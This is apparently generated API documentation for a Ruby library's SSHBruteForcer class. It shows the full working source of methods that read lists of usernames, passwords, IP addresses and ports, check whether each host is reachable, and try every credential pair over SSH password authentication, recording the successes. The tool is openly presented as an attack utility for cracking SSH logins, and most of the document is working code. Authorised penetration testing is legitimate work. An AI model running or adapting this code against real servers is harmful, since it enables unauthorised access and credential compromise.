Class: ViolentRuby::SSHBruteForcer

Inherits:

Object

• Object
• ViolentRuby::SSHBruteForcer

Defined in:

lib/violent_ruby/ssh_brute_forcer/ssh_brute_forcer.rb

Overview

The SSH Brute Forcer class provides a simply way to brute-force an SSH server’s credentials.

Examples:

Basic Usage

ssh = SSHBruteForcer.new
ssh.users     = "resources/ssh_users.txt"
ssh.passwords = "resources/ssh_passwords.txt"
ssh.ips       = "resources/ssh_ips.txt"
ssh.ports     = "resources/ssh_ports.txt"
# brue'm!
ssh.brute_force!
# => results

Author:

• Kent ‘picat’ Gruber

Instance Attribute Summary

• #ips ⇒ Object
• #passwords ⇒ Object
• #ports ⇒ Object
• #users ⇒ Object

Instance Method Summary

• #able_to_login?(args = {}) ⇒ Boolean

  Check if a given IP address, port, username and passwords are correct to login.

• #brute_force(args = {}) ⇒ Array<Hash> (also: #brute_force!)

  Brute force some’a dem SSH login credz.

• #connectable?(args = {}) ⇒ Boolean

  Check if a given IP address and port can connceted to.

• #initialize(args = {}) ⇒ SSHBruteForcer constructor

  Create a new SSH Brute Forcer.

Constructor Details

#initialize(args = {}) ⇒ SSHBruteForcer

Create a new SSH Brute Forcer.

Parameters:

• args (Hash) (defaults to: {}) —

  The options to create a new SSH Brute Forcer.

• args (String) (defaults to: {}) —

  :users The path to a file of users to attempt.

• args (String) (defaults to: {}) —

  :passwords The path to a file of passwords to attempt.

• args (String) (defaults to: {}) —

  :ips The path to a file of server ips to attempt to connect to.

• args (String) (defaults to: {}) —

  :ports The path to a file of service ports to attempt to connect to.

# File 'lib/violent_ruby/ssh_brute_forcer/ssh_brute_forcer.rb', line 37

def initialize(args = {})
  @users     = args[:users]     if args[:users]     && File.readable?(args[:users]) 
  @passwords = args[:passwords] if args[:passwords] && File.readable?(args[:passwords])
  @ips       = args[:ips]       if args[:ips]       && File.readable?(args[:ips])
  @ports     = args[:ports]     if args[:ports]     && File.readable?(args[:ports])
end

Instance Attribute Details

#ips ⇒ Object

# File 'lib/violent_ruby/ssh_brute_forcer/ssh_brute_forcer.rb', line 26

def ips
  @ips
end

#passwords ⇒ Object

# File 'lib/violent_ruby/ssh_brute_forcer/ssh_brute_forcer.rb', line 24

def passwords
  @passwords
end

#ports ⇒ Object

# File 'lib/violent_ruby/ssh_brute_forcer/ssh_brute_forcer.rb', line 28

def ports
  @ports
end

#users ⇒ Object

# File 'lib/violent_ruby/ssh_brute_forcer/ssh_brute_forcer.rb', line 22

def users
  @users
end

Instance Method Details

#able_to_login?(args = {}) ⇒ Boolean

Check if a given IP address, port, username and passwords are correct to login.

Parameters:

• args (Hash) (defaults to: {})
• args (String) (defaults to: {}) —

  :ip

• args (String) (defaults to: {}) —

  :port

• args (String) (defaults to: {}) —

  :username

• args (String) (defaults to: {}) —

  :password

Returns:

• (Boolean)

See Also:

• #brute_force

# File 'lib/violent_ruby/ssh_brute_forcer/ssh_brute_forcer.rb', line 105

def able_to_login?(args = {})
  Net::SSH.start(args[:ip], 
                 args[:username],
                 port: args[:port].to_i,
                 password: args[:password],
                 auth_methods: ['password'],
                 number_of_password_prompts: 0)
  true
rescue
  false
end

#brute_force(args = {}) ⇒ Array<Hash> Also known as: brute_force!

Brute force some’a dem SSH login credz.

Parameters:

• args (Hash) (defaults to: {}) —

  The options to brute force.

• args (String) (defaults to: {}) —

  :users The path to a file of users to attempt.

• args (String) (defaults to: {}) —

  :passwords The path to a file of passwords to attempt.

• args (String) (defaults to: {}) —

  :ips The path to a file of server ips to attempt to connect to.

• args (String) (defaults to: {}) —

  :ports The path to a file of service ports to attempt to connect to.

Returns:

• (Array<Hash>)

# File 'lib/violent_ruby/ssh_brute_forcer/ssh_brute_forcer.rb', line 52

def brute_force(args = {})
  meets_our_requirements?(args) 
  results   = []
  ips       = args[:ips]        || @ips 
  ports     = args[:ports]      || @ports
  users     = args[:users]      || @users
  passwords = args[:passwords]  || @passwords
  iterate_over(ips).each do |ip|
    iterate_over(ports).each do |port|
      next unless connectable?(ip: ip, port: port)
      iterate_over(users).each do |user|
        iterate_over(passwords).each do |password|
          if able_to_login?(ip: ip, port: port, username: user, password: password)
            result = format_result("SUCCESS", ip, port, user, password)
          else
            result = format_result("FAILURE", ip, port, user, password)
          end
          results << result
          yield result if block_given?
        end
      end
    end
  end
  results
end

#connectable?(args = {}) ⇒ Boolean

Check if a given IP address and port can connceted to.

Parameters:

• args (Hash) (defaults to: {}) —

  the options to brute force.

• args (String) (defaults to: {}) —

  :ip The ip address to attempt to connect to.

• args (String) (defaults to: {}) —

  :port The port to attempt to connect to.

Returns:

• (Boolean)

See Also:

• #brute_force

# File 'lib/violent_ruby/ssh_brute_forcer/ssh_brute_forcer.rb', line 87

def connectable?(args = {})
  Timeout::timeout(2) do
    Socketry::TCP::Socket.connect(args[:ip], args[:port])
    return true
  end
rescue
  false
end